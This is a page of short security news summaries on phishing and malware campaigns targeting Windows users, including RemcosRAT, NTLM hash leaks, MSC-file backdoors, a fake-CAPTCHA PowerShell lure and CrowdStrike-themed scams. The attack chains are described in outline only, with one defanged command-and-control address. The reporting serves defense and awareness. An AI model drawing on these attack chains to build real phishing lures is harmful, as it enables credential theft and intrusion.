We value your privacy

We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies.

Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

NewApp Digest
search bot

phishing email

Do Not Open This PDF On A Microsoft Windows PC
Winsage
May 4, 2025

Do Not Open This PDF On A Microsoft Windows PC

Microsoft has warned about the increasing use of PDF attachments in cyberattacks, particularly during the U.S. tax season. Attackers have been using PDFs with embedded links that redirect users to counterfeit pages, such as a fake DocuSign site. TrustWave SpiderLabs has identified a new campaign involving a fake payment SWIFT copy that leads to a malicious PDF containing obfuscated JavaScript, which downloads a script that conceals the RemcosRAT payload using steganography. This technique involves hiding links within images, making them difficult to detect. The latest attacks begin with phishing emails containing malicious PDFs that direct victims to harmful webpages, facilitating the delivery of RemcosRAT, a trojan that allows remote control of compromised systems. Users are advised to be cautious of emails labeled “SWIFT Copy” and to delete suspicious emails immediately.
Windows vulnerability with NTLM hash abuse exploited for phishing
Winsage
April 19, 2025

Windows vulnerability with NTLM hash abuse exploited for phishing

A vulnerability in Windows, identified as CVE-2025-24054, is being exploited in phishing campaigns targeting government and private organizations. Initially considered low-risk, it was addressed in Microsoft's March 2025 Patch Tuesday updates. Following the release of these patches, Check Point observed a rise in exploitation attempts, particularly linked to the Russian group APT28. Attackers sent phishing emails with Dropbox links containing .library-ms files, which, when accessed, connected to an external SMB server controlled by the attackers, allowing interception of NTLM hashes. A subsequent wave of attacks involved .library-ms files sent as direct attachments, requiring minimal user interaction to exploit the vulnerability. The malicious ZIP archive also contained files exploiting older NTLM vulnerabilities. Check Point identified the attackers' SMB servers with specific IP addresses. Despite being classified as medium-severity, the vulnerability's potential impact is significant, prompting organizations to apply the March 2025 updates and consider disabling NTLM authentication if not essential.
Windows NTLM hash leak flaw exploited in phishing attacks on governments
Winsage
April 17, 2025

Windows NTLM hash leak flaw exploited in phishing attacks on governments

A vulnerability in Windows, identified as CVE-2025-24054, is being actively exploited in phishing campaigns targeting government and private sectors. Initially addressed in Microsoft's March 2025 Patch Tuesday, it was not considered actively exploited at that time. Researchers from Check Point reported increased exploitation activities shortly after the patches were released, particularly between March 20 and 25, 2025. Some attacks were linked to the Russian state-sponsored group APT28, but definitive attribution is lacking. The vulnerability allows attackers to capture NTLM hashes through phishing emails containing manipulated .library-ms files that trigger the flaw when interacted with. Check Point noted that subsequent attacks involved .library-ms files sent directly, requiring minimal user interaction to exploit. The malicious files also included additional components that exploit older vulnerabilities related to NTLM hash leaks. The attacker-controlled SMB servers were traced to specific IP addresses. Although rated as medium severity, the potential for authentication bypass and privilege escalation makes it a significant concern, prompting recommendations for organizations to install updates and disable NTLM authentication if not necessary.
Hackers Exploit Microsoft Management Console to Drop Backdoor Payloads on Windows
Winsage
December 17, 2024

Hackers Exploit Microsoft Management Console to Drop Backdoor Payloads on Windows

The Securonix Threat Research team has identified a phishing campaign called the “FLUX#CONSOLE campaign,” which targets tax-related themes using Microsoft Common Console Document (MSC) files to deliver a backdoor payload. The attack begins with a phishing email containing a decoy PDF titled “Income-Tax-Deduction-and-Rebates202441712.pdf,” which conceals an MSC file that executes malicious payloads. The campaign employs various tactics, including tax-themed lures, exploitation of MSC files, DLL sideloading using DISM.exe, persistence through scheduled tasks, and advanced obfuscation techniques. The attack chain involves tricking users into opening a malicious MSC file disguised as a PDF, which contains XML commands to download or extract a malicious DLL named DismCore.dll. The DLL is sideloaded using Dism.exe, and the malware communicates with a Command-and-Control server at “hxxps://siasat[.]top,” exfiltrating data via encrypted HTTPS traffic. The attackers maintained access for about 24 hours, targeting victims in Pakistan. The tactics used do not align with known advanced persistent threat groups, highlighting the growing threat of MSC files as a delivery method for malware. Indicators of Compromise (IOCs) include the C2 address siasat[.]top and analyzed file hashes for the malicious files involved in the campaign.
Revamped Remcos RAT Deployed Against Microsoft Users
Winsage
November 12, 2024

Revamped Remcos RAT Deployed Against Microsoft Users

Threat actors have enhanced the Remcos remote access tool, making it a more sophisticated malware variant by using multiple layers of scripting languages to evade detection. This new campaign exploits a known remote code execution vulnerability in unpatched Microsoft Office and WordPad applications, initiated through a phishing email containing a disguised Excel file. The malware employs various encoding methods and obfuscation techniques to avoid analysis, including the use of PowerShell scripts and API hooking. It gathers information from the victim's device and transmits it to a command and control server. Experts emphasize the importance of patching, employee training, and robust endpoint protection to defend against such attacks.
Critical OPA Vulnerability Exposes Windows Credentials
Winsage
October 23, 2024

Critical OPA Vulnerability Exposes Windows Credentials

A significant security flaw, designated CVE-2024-8260, was discovered in Styra’s Open Policy Agent (OPA) by researchers at Tenable. This vulnerability, with a CVSS score of 6.1, can expose the credentials of millions of Windows users. It allows attackers to exploit OPA by sending a malicious command that deceives the system into authenticating with a remote server controlled by the attacker, leading to the leakage of NTLM credentials. Organizations using the OPA CLI or OPA Go package on Windows are advised to update to OPA v0.68.0 to address this issue. Exploitation can occur through social engineering, where attackers persuade users to execute OPA via malicious file attachments. Attackers can manipulate the environment to connect to their server using a Universal Naming Convention (UNC) path and can use Rego rules to redirect OPA communications. When a user accesses a remote share on Windows, the NTLM hash is transmitted, allowing attackers to relay the leaked authentication or use the credentials to access other systems. The risk increases if the vulnerable OPA server accepts inputs from users or third parties, especially in cloud-native applications that require dynamic input.
This Windows PowerShell Phish Has Scary Potential – Krebs on Security
Winsage
September 20, 2024

This Windows PowerShell Phish Has Scary Potential – Krebs on Security

Many GitHub users received a phishing email impersonating GitHub's security team, warning them of vulnerabilities in their repositories and directing them to a malicious link. Clicking the link led to a deceptive CAPTCHA that initiated a download of password-stealing malware. The process involved pressing the Windows key and "R" to open the Run prompt, followed by "CTRL" and "V" to paste malicious code, and then pressing "Enter" to execute a PowerShell command that downloaded a file named “l6e.exe,” known as Lumma Stealer, which extracts stored credentials. Microsoft advises against disabling PowerShell, as it is essential for system processes, and modifying its settings can be complex.
CrowdStrike 'Updates' Deliver Malware & More as Attacks Snowball
Winsage
July 28, 2024

CrowdStrike ‘Updates’ Deliver Malware & More as Attacks Snowball

A surge of cybercriminal activity has followed the CrowdStrike outage, leading to an increase in social engineering attacks targeting the vendor's clients. National cybersecurity agencies in the US, UK, Canada, and Australia have reported a rise in phishing attempts, with daily attacks ranging from 150 to 300, significantly higher than typical volumes. Cybercriminals are exploiting the outage by impersonating CrowdStrike and offering technical support, targeting organizations directly affected by the incident. Over 2,000 phishing and typosquatting domains related to CrowdStrike have been registered, which may be used for malware distribution. Specific attacks have included a ZIP file containing HijackLoader and a phishing email with a malicious PDF attachment that installed a wiper. Organizations are advised to enhance their defenses by using blocklists and protective DNS tools and to seek support only from official CrowdStrike channels.
Windows SmartScreen Flaw Enabling Data Theft in Major Stealer Attack
Winsage
July 24, 2024

Windows SmartScreen Flaw Enabling Data Theft in Major Stealer Attack

The attack chain begins with a phishing email containing a malicious link that downloads an LNK file, which then executes an HTA script that decodes a payload. Two types of shellcode injectors are used to inject a final stealer into legitimate processes. The stealer deployed can target various applications and is tailored to specific regions. Implementing Microsoft's latest security updates is crucial to stay protected against the CVE-2024-21412 vulnerability.
Search